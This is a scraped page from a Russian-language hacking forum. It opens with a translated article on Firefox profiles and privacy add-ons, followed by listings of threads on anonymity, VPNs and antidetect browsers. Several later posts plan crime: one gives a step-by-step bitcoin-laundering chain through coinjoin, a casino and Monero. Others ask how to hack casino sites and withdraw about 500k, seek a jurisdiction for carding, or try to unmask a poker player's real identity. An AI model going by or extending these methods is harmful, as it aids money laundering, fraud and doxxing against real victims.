Случайно наткнулся на рекламу, а затем был засыпан ею. Теперь, если вы хотите уйти от всего этого, эта статья - ответ для вас. Но прежде чем мы сможем поговорить о различных плагинах, которые помогают нам оставаться защищенными, мы поговорим о профилировании в Firefox.

Профилирование в Firefox

В Firefox вы можете создавать различные профили в браузере в соответствии с вашими потребностями, поскольку эти профили можно настраивать. Например, у вас может быть один профиль для исследовательских целей, а другой - для VAPT. Создавать эти профили удобно и довольно просто. Чтобы создать профиль, откройте браузер Firefox и введите "about: profiles" на вкладке URL. Затем просто щелкните левой кнопкой мыши "Create New Tab" как показано на изображении ниже:

После того, как вы нажмете "Create New Profile", откроется диалоговое окно. Введите имя нужного профиля, например "Research_division". После этого нажмите кнопку "Finish", и профиль будет создан.

Точно так же вы можете создать столько профилей, сколько захотите, с разными именами в зависимости от ваших потребностей. На изображении ниже вы можете видеть, что мы создали еще один профиль под названием Privacy and Protections. Расположение по умолчанию для каждого профиля в Windows - C:\Users%username%\AppData\Roaming\Mozilla\Firefox\ Profiles, а в Linux путь будет /root.mozilla/firefox/.Privacy and Protection (как показано на изображении ниже), но вы всегда можете изменить их по своему желанию.

Оба наших профиля созданы так, как мы хотели, с индивидуальной настройкой, как показано на изображении ниже. Эти профили отделяют друг от друга всю информацию, плагины и настройки. Как только все профили будут созданы, вам будет предложено выбрать, хотите ли вы установить профиль по умолчанию или запустить его в новом окне браузера. Вы также можете переименовать или удалить профили. Это также дает вам возможность напрямую открывать то место, где расположены профили. Здесь вы найдете как корневой каталог, так и пути к локальному каталогу.

**Плагины

uBlock Origin**

uBlock создан Raymond Hill. Это расширение с открытым исходным кодом. Он блокирует всю рекламу в целом, особенно ту, которая потенциально может быть вредоносной. Он даже отфильтровывает URL-адреса различной рекламы, которая использует трекеры для отслеживания ваших предпочтений и информации. Основная особенность этого замечательного блокировщика рекламы заключается в том, что он блокирует даже самые современные методы отслеживания, такие как CNAME. Когда вы переходите с веб-сайта на веб-сайт, uBlock останавливает один веб- сайт, чтобы поделиться вашими данными с другим. Этот метод обмена данными между веб-сайтами и другими блокировщиками рекламы сложнее определить, поскольку эта конкретная проблема остается, но с источником uBlock; это не проблема. Наряду со всем этим он также блокирует всплывающие окна, косметическую рекламу, удаленные шрифты и даже отключает JavaScript. Бонус к этому, он также удаляет рекламу на Youtube.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button", как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

uMatrix

uMatrix - это дополнение, также созданное Raymond Hill. Это дополнение было разработано, чтобы легко управлять вашим веб-контентом, то есть вы можете разрешить, что будет загружаться в вашем браузере, а что нет. Эта надстройка работает как брандмауэр, не позволяя веб-сайтам использовать ваши файлы cookie, и защищает вас от вредоносных программ, трекеров, вредоносного ПО и так далее важно помнить, что при загрузке данных в браузеры это дополнение блокирует трекер и не позволяет ненужному коду выполнять себя; увеличивает скорость загрузки интернета и страниц. Даже потребление полосы пропускания улучшается. uMAtrix принимает меры предосторожности и блокирует сторонний домен, что затрудняет доступ к некоторым сайтам, но это можно контролировать в зависимости от ваших требований. С помощью uMatrix вы можете контролировать:

Cookies

CSS

Image

Media

Scripts

XHR

Frame

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button" как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

HTTPS Everywhere

В Интернете существует множество веб-сайтов, на которых отсутствует защита уровня SSL. Почти все они используются в качестве приманки для взлома или сами подвержены атакам Man In The Middle (MITM). Просматривая веб-страницы, вы никогда не можете быть уверены, что это за веб-сайт и безопасно ли их просматривать. Следовательно, HTTPS Everywhere - это ответ на эту проблему, поскольку он защищает от таких онлайн-угроз. Это расширение браузера обеспечивает уровень защиты SSL/TSL в Интернете. Этот уровень защиты позволяет вам зашифровать любую информацию, отправляемую или получаемую с веб-сайта, что защищает ваши данные от таких атак, как спуфинг, сниффинг, MITM и так далее.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button" как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

Privacy Settings

Это расширение разработано Jeremy Schomery. Это наиболее удобное расширение, поскольку оно объединяет все параметры настройки конфиденциальности в одном месте. Все настройки можно изменить из всплывающего меню расширения. У него есть панель инструментов для всех наших предпочтений. Чтобы обеспечить вам конфиденциальность, это расширение гарантирует, что никакие данные не будут отправлены на сторонний веб-сайт.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button" как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

NoScript Security Suite

NoScript Security Suite разработан Giorgio Maone. Он упоминается как пакет, поскольку он обеспечивает различные меры безопасности как для разработчиков, так и для аналитиков безопасности. Чтобы обеспечить полную безопасность, многие аналитики безопасности утверждают, что отключение JavaScript в браузере

важная практика. Есть несколько, но серьезных уязвимостей браузера, которые используют JavaScript для атаки на цель. Хотя почти все сайты стараются обезопасить себя от этих уязвимостей. Но никогда нельзя быть слишком уверенным. Это глупое дело - полностью полагаться на других в своей защите. Так что, чтобы защитить себя от их конца тоже нужно играть. И это расширение помогает нам в достижении сказанного. NoScript помогает максимально легко контролировать отключение JavaScript. Здесь важно отметить, что многие люди будут заявлять, что современные браузеры предоставляют нам возможность отключить JavaScript, тогда зачем нам это расширение? Здесь следует отметить, что этот параметр ограничен (ограничение зависит от браузера), и вы не можете управлять им, как с помощью NoScript. Это расширение активно блокирует исполняемый контент, который отклоняется во всем мире. Он также обеспечивает защиту от известных уязвимостей. Что наиболее важно, он предлагает безопасность на стороне клиента, обеспечивая защиту от межсайтовых сценариев (XSS) и инъекций HTML, поскольку он идентифицирует вредоносный запрос и нейтрализует его. Это расширение также включает Application Boundaries Enforcer, который работает как брандмауэр, и политики этого брандмауэра могут быть определены пользователем. Он защищает точку входа в браузер, что, в свою очередь, помогает пользователю защитить себя от атак, таких как CSRF и повторная привязка DNS. Это превосходное расширение также обеспечивает защиту от кликджекинга и HTTPS.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button", как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

Privacy Badger

Это дополнение разработано EFF Technologies, и они проделали потрясающую работу с этим дополнением. Во время работы в Интернете конфиденциальность является обязательной. Но существует множество трекинговых объявлений, кликбейтов и так далее, которые прерывают ваш плавный серфинг и заставляют вас пасть жертвой этого, даже не подозревая. Хуже всего то, что практически невозможно узнать, отслеживают ли вас или нет. Мы можем просто идентифицировать доказательства, например, если вы что-то ищете в Интернете; будьте уверены, что вы будете видеть рекламу по этому поводу в течение длительного времени, а значит, и онлайн-отслеживание. Расширение Privacy Badger здесь пригодится. Это расширение хвалят, поскольку оно блокирует файлы cookie, которые отслеживают вас, даже если вы их удалите, а также блокирует стороннее отслеживание. Для загрузки сайта требуются сторонние домены, это могут быть карты, изображения и так далее. Здесь этот инструмент проанализирует его и разрешит важные требования и запретит отслеживающие файлы cookie и источники перехода. Файлы cookie, которые имеют идентификатор отслеживания или скрыты, не разрешены из-за этого дополнения. Он даже определяет супер-куки, которые отслеживают вас. Надстройка также работает в режиме инкогнито и позволяет заносить домены в белый список. Функция занесения доменов в белый список предоставляется, поэтому, если вы хотите разрешить отслеживание домена, вы можете разрешить это в соответствии с вашим требованием. Этот инструмент работает, определяя поведение домена, и у него также есть желтый список. Этот желтый список содержит названия веб-сайтов, которые, безусловно, собирают ваши данные и отслеживают вас.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button" как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

Decentraleyes

Decentrelayes разработан Thomas Reintjes. Это замечательное дополнение, и вы должны серьезно относиться к конфиденциальности и защите. Обычно, просматривая Интернет, вы подключаетесь к общедоступной сети доставки контента. Это соединение позволяет вам получить доступ к важным и необходимым библиотекам javascript, которые позволяют загружать контент на вашу веб-страницу. Дело в том, что постоянное подключение к общедоступным CDN небезопасно с точки зрения конфиденциальности и отслеживания, и это проблема, потому что вы не можете путешествовать по сети без таких библиотек. Решением всех этих проблем является Decentrelayes. На сервере вы с девизом конфиденциальности и защиты от отслеживания Decenterelayes берет необходимые библиотеки и хранит их на своем локальном компьютере. Таким образом, когда вы находитесь в сети, вам не нужно подключаться к общедоступным CDN, поскольку вы можете использовать локальные. Четырнадцать библиотек JavaScript, предоставляемых Decentrelayes:

AngularJS

js

Dojo

js

Ext Core

JQuery

JQuery UI

Modemizr

MooTools

Prototype

Scriptaculous

SWFObject

js

Web Font Loader

И список сетей, поддерживаемых этим чудесным расширением, следующий:

Google Hosted Libraries

Microsoft Ajax

Cloudflare

JSDelivr

Yandex CDN

Baidu CDN

Sina Public Resources

UpYun libraries

Он работает путем анализа HTML-кода. После изучения данных HTML он возьмет общедоступные CDN и поменяет их местными с локальными, которые он предоставляет. Таким образом, запрос к внешнему CDN никогда не отправляется из браузера. Следовательно, они не могут отслеживать вашу активность в Интернете или получать доступ к вашим данным.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button", как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

Terms of Service; Didn’t Read- расширение для браузера, разработанное Abdullah Diaa, Hugo, Michiel de Jong. Название расширения - это игра слов "Too long; Didn’t Read". Это простейшее и в то же время самое важное расширение. Когда доходит до Условий и услуг веб-сайта, никто не тратит время на щелчки "I Agree" или "I Accept". Огромное количество и сложный текст всех смущают. Мы все делаем это, но никто из нас не имеет ни малейшего представления о том, на что мы соглашаемся. Следовательно, это расширение. Это дополнение удобно, поскольку оно оценивает Условия предоставления услуг, предоставляемых различными веб-сайтами. Эти оценки от A до E; где A - лучший, а E — худший. Оно также рассматривает политику конфиденциальности как положительную, отрицательную и нейтральную. Теперь, после ознакомления с условиями предоставления услуг через это расширение, пользователь полностью зависит от того, получать ли доступ к веб-сайту или нет. Цель этого дополнения - информировать пользователя о подлинности сайтов, которые они используют, и сообщать им о политиках и о том, с чем они соглашаются; просто чтобы они могли составить мнение и решить, хотят они продолжать или нет.

Чтобы добавить это расширение в свой браузер, просто откройте свой браузер. А затем найдите конкретное расширение. В магазине расширений нажмите кнопку "Add to Firefox", а затем еще раз во всплывающем диалоговом окне нажмите "add button", как показано на изображении ниже. Расширение будет добавлено в ваш браузер. И вы можете настроить параметры расширения из виджета расширения в правой части вкладки URL.

Snowflake

Расширение Snowflake создано The Tor Project. Он был разработан, чтобы предоставить легкий доступ к сети Tor после того, как правительства запретили мосты Tor. Поскольку это сеть Tor, она позволяет вам быть анонимным в Интернете; все время защищая ваши данные и личность. Это расширение для веб- браузера позволяет подключаться к сети tor через прокси, и в этой сети есть множество серверов. Точки входа на эти серверы известны как мост Tor, также есть ретрансляторы Tor, которые отражают трафик и помогают оставаться анонимным, пока они находятся в серфинге. Поскольку это позволяет вам оставаться анонимным, вы защищены от отслеживания, и даже ваши данные не могут быть собраны. Это также помогает скрыть IP-адрес.

Temporary Containers

Когда вы традиционно просматриваете Интернет, он сохраняет все ваши файлы cookie и кеш в одном месте. Это позволяет им легко украсть наши данные, нарушить нашу конфиденциальность и отслеживать нас. Но если все это где-то отдельно хранить, то проблема будет решена. И это можно сделать с помощью временных контейнеров. Это позволяет вам создать контейнер, через который вы можете путешествовать по Интернету, не беспокоясь о том, что вас отслеживают. Контейнеры, созданные этим расширением, изолированы, так как оно направлено на отделение данных от остальной части браузера. Эти контейнеры аналогичны базовому профилированию, предоставляемому Firefox (как упоминалось в начале этой статьи). И, объединив профилирование и это расширение браузера временных контейнеров, ваш браузер создаст безопасную среду для вашего серфинга в Интернете, поскольку контейнеры удаляются при закрытии последней вкладки и, следовательно, ее данных. Автоматический или ручной; оба режима поддерживаются им.

Заключение

Основные социальные сети, торговые сайты и другие веб-страницы отслеживают вас по вашим симпатиям и антипатиям, а также по вашему местоположению. Ведут журнал каждой своей онлайн-активности. Они даже отслеживают то, что вы начинаете писать, но не публикуют для отслеживания вашей самоцензуры. И это всего лишь несколько вещей, о которых мы упомянули. Чтобы лучше понять отслеживание в Интернете, вы можете прочитать эту статью здесь ([https://www.eff.org/deeplinks/2018/...-through-your-microphone-serve-you- creepy-ads](https://www.eff.org/deeplinks/2018/04/facebook-doesnt-need-listen- through-your-microphone-serve-you-creepy-ads)). А используя все такие надстройки, вы можете быть в безопасности и защищаться в сети, получая быстрый и безопасный доступ в Интернет с усиленной защитой.

Все эти дополнения имеют открытый исходный код и бесплатны для использования. Это надежные надстройки, которые обеспечивают безопасность и конфиденциальность любому пользователю, использующему его. Лучше всего то, что все это можно настроить в соответствии с потребностями и требованиями пользователя. Сознательное и правильное использование этих расширений сделает вас несуществующими в плане онлайн-отслеживания.

Источник <https://www.hackingarticles.in/firefox-for-pentester-privacy-and- protection-add-ons/>
Автор перевода: yashechka
Переведено специально для https://xss.is

Настольная книга анонима

ID: 676533bbb4103b69df371c46
Thread ID: 47750
Created: 2021-02-07T15:25:54+0000
Last Post: 2021-02-07T15:25:54+0000
Author: DikTor
Prefix: Мануал/Книга
Replies: 0 Views: 2K

Автор: Анонимный исследователь
Название: Настольная книга анонима
Язык: русский
Объем страниц: 49 стр.
Формат: PDF

Маленькая книжечка, в которой затрагиваются темы связанные с анонимностью и конфиденциальностью.
Эта книга представляет собой маленькое руководство. Данная книга отлично подойдет для новичков и для всех тех кому интересна тема анонимности и конфиденциальности.

Скачать:

Hidden content for authorized users.

[ AnonymousHandbook.pdf - AnonFiles

](https://anonfiles.com/V4a578G2pc/AnonymousHandbook_pdf)

anonfiles.com

![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)

[ DropMeFiles – free one-click file sharing service

](https://dropmefiles.com/9uy4h)

Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.

dropmefiles.com

Перевод статьи AEZAKMI "Аспекты анонимности браузера 2020"

ID: 676533bbb4103b69df371c4a
Thread ID: 45393
Created: 2020-12-10T14:55:03+0000
Last Post: 2021-02-02T18:44:04+0000
Author: PicMe
Replies: 3 Views: 2K

Перевод статьи AEZAKMI "Аспекты анонимности браузера 2020"

Курсы CHFI v9 | Форенсика, Компьютерная криминалистика | Manual + Tools

ID: 676533bbb4103b69df371c4f
Thread ID: 40224
Created: 2020-07-30T16:27:09+0000
Last Post: 2021-01-30T06:33:03+0000
Author: lima8v4v
Prefix: Видео
Replies: 3 Views: 2K

**Computer Hacking Forensic Investigator (CHFI) v9

Курсы по компьютерной криминалистике

Описание**
Целью программы является получение слушателем необходимых навыков расследования преступлений, сбора доказательной базы в области кибербезопасности с использованием новейших технологий цифровой криминалистики.

Содержание
14 уроков
39 практических занятий

Кому необходим сертификат CHFI

Специалистам по digital-форензике

Для подтверждения квалификации специалиста по расследованию инцидентов и Response Investigation.

Специалистам по безопасности электронного бизнеса

Для получения навыков реагирования на инциденты и их разбора, а также для построения механизмов реагирования.

Системным администраторам

Для получения навыков расследования инцидентов в сети и корпоративной инфраструктуре.

E-Discovery специалистам

Для работы с электронными доказательствами и понимания принципов и основ расследования инцидентов.

Скачать

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)

[ File folder on MEGA

](https://mega.nz/folder/fBJzUYQY#yhs2nAV7DwCTL6xiil9OgQ/folder/PYgl2K4I)

mega.nz

Что лучше свой VPN или сервис?

ID: 676533bbb4103b69df371c59
Thread ID: 46852
Created: 2021-01-16T15:23:38+0000
Last Post: 2021-01-19T05:32:21+0000
Author: Pirone
Replies: 29 Views: 2K

Хочу поднять вопрос.

Подскажите анонимный сервис аренды vds

ID: 676533bbb4103b69df371c5b
Thread ID: 34536
Created: 2020-01-23T04:45:21+0000
Last Post: 2021-01-16T20:56:08+0000
Author: Asfixia
Replies: 2 Views: 2K

Посоветуйте забугорный сервис по аренде vds/vps, у которых нет представительств в РФ
Понимаю что практически все могут выдать информацию по запросу правоохранителей, но все же они более безопасны, чем отечественные

Как проксировать трафик с виртуальной машины?

ID: 676533bbb4103b69df371c5c
Thread ID: 46618
Created: 2021-01-12T08:54:01+0000
Last Post: 2021-01-15T08:41:00+0000
Author: Harold7
Replies: 22 Views: 2K

В настройках вм включено два адаптера: на первом сетевой мост и указан мой wifi адаптер, на втором - nat. Хочу отправлять трафик на локалхост:8080, но ничего не выходит. Пробовал проксифаер, но он трафик с вм вообще не видит. Подскажите пожалуйста, как можно реализовать.

Настройка Agnitum для виртуалок

ID: 676533bbb4103b69df371c60
Thread ID: 46324
Created: 2021-01-04T22:49:22+0000
Last Post: 2021-01-08T01:15:44+0000
Author: fraysi
Replies: 20 Views: 2K

На windows 10 стоит файрволл agnitum outpost, перестал работать интернет на виртуалках (virtualbox), в настройках ничего не менялось. С openvpn также периодически обрывается коннект. Как настроить подскажите?

Вопрос по созданию своего VPN сервера

ID: 676533bbb4103b69df371c66
Thread ID: 45401
Created: 2020-12-10T18:21:14+0000
Last Post: 2020-12-25T09:07:03+0000
Author: user8895
Replies: 9 Views: 2K

Здравствуйте!
Хотел бы задать несколько вопросов по создания своего VPN сервера.

1. В какой стране лучше поднимать свой VPN сервер, что бы не достали власти?
Слышал, можно поднять в Нидерландах или Германии, хороши ли эти варианты? Где наилучшая юрисдикция для нелегальных дел, по типу кардинга?

2. Все вокруг говорят поднимать свой VPN вместо использования VPN сервисов, мол это безопаснее, логи точно не ведуться, потому что VPN свой. Но я вот задумался, а не могут ли вести логи трафика хостеры виртуальных серверов, на которых стоит VPN, точно так же как и VPN сервисы? Насколько это безопасно?

3. Безопасно ли использовать один свой VPN сервер постоянно? Один IP, как никак. Или лучше стоит постоянно менять сервер?

4. А так же хотел спросить совета, какой лучше использовать хостинг виртуальных серверов у котого будут сервера в тех странах в которых лучше размещать сервер для VPN?
И есть ли разница для безопаности в выборе хостера сервера? Если, например, реселлер сервера русский, а сам сервер немецкий?

Спасибо!

Best VPN service.

ID: 676533bbb4103b69df371c6b
Thread ID: 45422
Created: 2020-12-11T11:43:46+0000
Last Post: 2020-12-14T22:18:47+0000
Author: VoidZero
Replies: 12 Views: 2K

What's the best, fully anonymous / secure: VPN service?

Two of the major ones:

“https://www.doublevpn.com/en”.

“https://safe-inet.com/“.

Waiting for yours suggestions.
Thanks in advance!

Best regards,
VoidZero.

Подскажите, реально ли это?

ID: 676533bbb4103b69df371c75
Thread ID: 40957
Created: 2020-08-15T16:29:49+0000
Last Post: 2020-12-01T03:16:56+0000
Author: Grozniy
Replies: 9 Views: 2K

Меня интересует конкретный человек, а именно игрок из pokerstars, известен только его ник. Вопрос: возможно ли как то найти его реальные контактные данные (email, соц сети, и т.д). Весь google прошерстил, сервисы поиска по нику тоже, в чате покера не отвечает. Возможно, как-то внутри приложения в коде и т.д можно посмотреть его email, не судите строго в "коде" не шарю, или есть пробивалы которые возьмутся. За любую информацию буду благодарен.

Ubuntu(18.04) & Debian пускаем траф только через VPN. (Iptables)

ID: 676533bbb4103b69df371c79
Thread ID: 31082
Created: 2019-08-15T11:00:41+0000
Last Post: 2020-11-19T05:48:56+0000
Author: kolobok
Replies: 9 Views: 2K

Spoiler: VPN & DNS

Должен быть скачен файл конфигурации VPN - client.ovpn
Устанавливаем OpenVPN:
sudo apt-get update
sudo apt-get install openvpn
Kопируем файл конфига в папку /etc/openvpn:
sudo cp /home/user/папка где файл лежит/client.ovpn /etc/openvpn/
Для автозапуска необходимо переименовать файл c .ovpn > .conf:
sudo mv /etc/openvpn/client.ovpn /etc/openvpn/client.conf

Фиксим DNS
Ubuntu 18.04 использует systemd-resolved, поэтому все, что вам нужно сделать, это установить скрипт openvpn helper для systemd-resolved с помощью:
sudo apt install openvpn-systemd-resolved
Потом обновить конфиг client.conf:
sudo su - root
cd /etc/openvpn/
ls
nano client.conf
Добавляем в конце конфига:

Code:Copy to clipboard

script-security 2 up /etc/openvpn/update-systemd-resolved down /etc/openvpn/update-systemd-resolved down-pre

Для предотвращения утечки DNS добавялем в конфиг:

Code:Copy to clipboard

# prevent DNS leakage dhcp-option DOMAIN-ROUTE .

Должно получится в конце конфига:

Code:Copy to clipboard

script-security 2 up /etc/openvpn/update-systemd-resolved down /etc/openvpn/update-systemd-resolved down-pre # prevent DNS leakage dhcp-option DOMAIN-ROUTE .

Перезагружаем систему:
Sudo reboot

Spoiler: IPTABLES

Устанавливаем Iptables:

Code:Copy to clipboard

sudo apt-get install -y iptables-persistent sudo su - root cd /etc/iptables ls nano rules.v4

Вставляем это в конфиг:

Code:Copy to clipboard

*filter :INPUT ACCEPT [871:731233] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A OUTPUT -o lo -j ACCEPT -A OUTPUT -o tun0 -j ACCEPT -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A OUTPUT -d XX.XXX.XXX.XX/32 -p tcp -m tcp --dport XXX -j ACCEPT -A OUTPUT -j DROP COMMIT XX.XXX.XXX.XX - ваш IP из конфига VPN XXX - порт из конфига VPN

Перезапускаем правило:
sudo iptables-restore < /etc/iptables/rules.v4
Отключаем протокол ipv6:
в /etc/sysctl.conf добавляем net.ipv6.conf.all.disable_ipv6 = 1

[Обсуждения] Антидетект Браузеры

ID: 676533bbb4103b69df371c7f
Thread ID: 42690
Created: 2020-09-30T18:41:39+0000
Last Post: 2020-11-10T11:45:53+0000
Author: Barrasa
Replies: 9 Views: 2K

Многим будет полезно узнать о существовании этих браузеров,
"Что выбрать?"

Антидетект браузеры гарантируют конфиденциальность вебмастера: он подменяет отпечаток браузера и дает работать с кучей аккаунтов в одном профиле одновременно.

В этой статье собран список антидетект-браузеров из открытых источников, с кратким описанием функционала и стоимостью.

Обратите внимание: условия использования, оплата и другие моменты могут меняться, поэтому при работе с сервисами тщательно перепроверяйте все еще раз. Мы не можем отвечать за безопасность использования всех упоминаемых сервисов. Будьте внимательны и осторожны!

I. LINKEN SPHERE
Цена: 1 месяц — 1OO$ 6 месяцев — 5OO$ 12 месяцев — 9OO$

Она же Сфера, антидетект русскоязычных разработчиков. Браузер основан на движке Chromium, избавлен шпионского кода Google, так как изменены исходники. Разрешает создавать и работать с множеством аккаунтов и лучше подходит для Google Adwords и FB. В отличие от других браузеров, Linken Sphere не привязывается к устройству.

II. MULTILOGIN
Цена: 1 месяц —99 €

Представляет собой сервис, у которого два собственных браузера: Mimic и Stealthfox. Запилены на основе Chrome и Mozilla Firefox соответственно. Работают по принципу уникализации отпечатка браузера и могут работать сразу с 100 аккаунтами одновременно.

III. AEZAKMI
Цена: 1 месяц — 69$

Антидетект-браузер для безопасной работы с мультиаккаунтами, арбитражем трафика, букмекерскими вилками, а также контекстной рекламой и SMM. С помощью AEZAKMI можно заменить виртуальные машины одной программой, оставаясь незамеченным для антифрод систем.

IV. EPIC PRIVACY BROWSER
Цена: FREE

Еще один софт защищен на базе Chromium, с исключенными трекерами гугла и сторонних систем. Программа скорее относится к теме приватности, т.к для соединения использует свои прокси. Имеют внутренние прокси и сервера в 8 странах.

Антидетект-браузеров на рынке хватает. Есть разные варианты на любой кошелек, все зависит от масштаба вашей работы и уровня анонимности, который вы хотите получить. У многих продуктов есть триал, которым вы можете воспользоваться и понять, нужно ли вам это. Выбирайте, пользуйтесь на здоровье.

Напишите каким вы браузером пользуетесь

Гугл расширения

ID: 676533bbb4103b69df371c80
Thread ID: 41976
Created: 2020-09-11T15:08:30+0000
Last Post: 2020-11-10T09:55:37+0000
Author: negg
Replies: 9 Views: 2K

Опасны ли гугл расширения?Переводчик на ходу и тд,которые могут проследить серфинг мой. Под опасностью имею ввиду слежку.

Что такое проект Fugu и почему он добьёт антидетекты

ID: 676533bbb4103b69df371c81
Thread ID: 43533
Created: 2020-10-26T09:45:37+0000
Last Post: 2020-11-07T18:01:03+0000
Author: Xk-ar
Replies: 11 Views: 2K

Никому не секрет что анти-детекты доживают последние дни из за кома проблем который идёт с начала их существования.

Если вкратце описать эти проблемы, то все они связанны с плохой или вообще отсутствующей WinApi

Браузеры изначально задумывались с плотной работой OS
Рендер изображения
Доступ к аудиосистеме, вплоть до количества ваших устройств
Хеширование данных
Доступ к локальному диску, присутствие таких устройств как флеш накопители
Многие другие вещи которые принципе имеются в WinApi

Что такое Project Fugu?

Это проект, также известный как проект веб-возможностей, который был инициирован Google, Microsoft и Intel. Их амбиции поразительны:

Мы считаем, что веб-приложения должны уметь делать все, что могут делать нативные приложения.

Однако, раскрывая собственные возможности сети, все основные принципы сети, такие как безопасность пользователей, доверие и конфиденциальность, должны быть сохранены.

Кстати, именно с этой резолюцией и произошло название Fugu. Фугу - рыба фугу знаменитое блюдо японской кухни. Японцы говорят, что это вкусно, если приготовлено правильно, но также смертельно опасно. Точно так же и с проектом Google Web Capabilities. Хорошо иметь доступ ко всем встроенным функциям устройства, но это не должно происходить в ущерб основным принципам Интернета.

Идея Fugu состоит в том, чтобы постоянно оценивать, какие нативные возможности отсутствуют в сети. Основываясь на этих выявленных потребностях, они проектируют и создают новые веб-API, чтобы предоставить браузеру все больше и больше функций.

Вот пара примеров API, которые сейчас разрабатываются:
API собственной файловой системы

Этот API позволяет веб-приложениям взаимодействовать с файлами на локальном устройстве пользователя. Такие приложениях, как Photoshop или Visual Studio Code. Все они работают с файлами на вашем локальном устройстве. С помощью API собственной файловой системы вы можете создать его веб-версию, которая считывает и сохраняет изменения непосредственно в ваших локальных файлах и папках (конечно, после того, как вы предоставили требуемый доступ).

![web.dev](/proxy.php?image=https%3A%2F%2Fwebdev.imgix.net%2Ffile-system- access%2Fhero.jpg%3Fauto%3Dformat%26fit%3Dmax%26w%3D1200&hash=e27da5a98fc89c1a841487c77198ddff&return_error=1)

[ The File System Access API: simplifying access to local files

](https://web.dev/native-file-system/)

The File System Access API enables developers to build powerful web apps that interact with files on the user's local device, like IDEs, photo and video editors, text editors, and more. After a user grants a web app access, this API allows them to read or save changes directly to files and...

web.dev

Контекстное меню значка приложения

Еще одна встроенная возможность, связанная с главным экраном нашего устройства

это контекстное меню. Если вы долго нажимаете или щелкаете правой кнопкой мыши на приложение, вы обычно видите контекстное меню, позволяющее запускать определенные действия прямо с вашего домашнего экрана. С помощью Shortcuts API это станет возможным и для прогрессивных веб-приложений. Вы можете задать определенные действия с ярлыками в манифесте веб-приложений вашего PWA, чтобы включить настраиваемое контекстное меню.

Более того, если вы хотите увидеть все новые возможности, которые потенциально могут появиться в сети, существует официальное средство отслеживания проблем, в котором перечислены все функции. Он называется [Fugu API Tracker](https://docs.google.com/spreadsheets/d/1de0ZYDOcafNXXwMcg4EZhT0346QM- QFvZfoD8ZffHeA/edit#gid=557099940).

Мои мысли на этот счёт:
В общем приходит конец всем анти-детектам основанных на уровне движков браузеров, так как ребята просто не успевают и ничем кроме как монетизацией своих проектов не занимаются.
Спасибо за прочтение, всем peace.

4istka Bitcoina / washing Bitcoin?

ID: 676533bbb4103b69df371c82
Thread ID: 43890
Created: 2020-11-03T23:43:07+0000
Last Post: 2020-11-06T18:15:30+0000
Author: bnetmstr
Replies: 11 Views: 2K

Kak ja 4istil bitcoini ranshe:

Dirty bitcoin -> exchange to monero, wallet 1 -> send to monero wallet 2 -> exchange to bitcoin

Nu kak ja ponel tiper etot method ne aktualen, kak wi 4istite, anonymizirujete bitcoin?

Ja dumal tiper delot tak:

Dirty bitcoin -> Coin join -> deposit in casino site -> cashout to new wallet -> monero wallet 1 -> zcash -> monero wallet 2 -> exchange to bitcoin -> send to new bitcoin wallet

Shto dumajete?

Срок за взлом сайтов

ID: 676533bbb4103b69df371c86
Thread ID: 43777
Created: 2020-11-01T06:42:48+0000
Last Post: 2020-11-02T10:14:40+0000
Author: senegal55
Replies: 15 Views: 2K

Всем привет. Недавно задался таким вопросом, а какой срок дадут если наломать сайтов (казино и т.д.) на сумму около 500к . И как это лучше сделать, накрутить через админку себе денег и так выводить или с готовых счетов пользователей выводить? И как себя обезопасить

Анонимная транзакция криптовалютой Monero

ID: 676533bbb4103b69df371c87
Thread ID: 41168
Created: 2020-08-21T15:07:15+0000
Last Post: 2020-11-02T01:55:39+0000
Author: Misha_Klg
Replies: 5 Views: 2K

Здравствуйте,

Можно ли произвести анонимную оплату сервиса монетами Monero с предустановленного на Whonix кошелька? Если могут отследить то как?

Tails/Whonix/Kodachi безопасно ли на самом деле?

ID: 676533bbb4103b69df371c91
Thread ID: 42740
Created: 2020-10-01T14:08:16+0000
Last Post: 2020-10-06T19:54:13+0000
Author: ivanxss
Replies: 17 Views: 2K

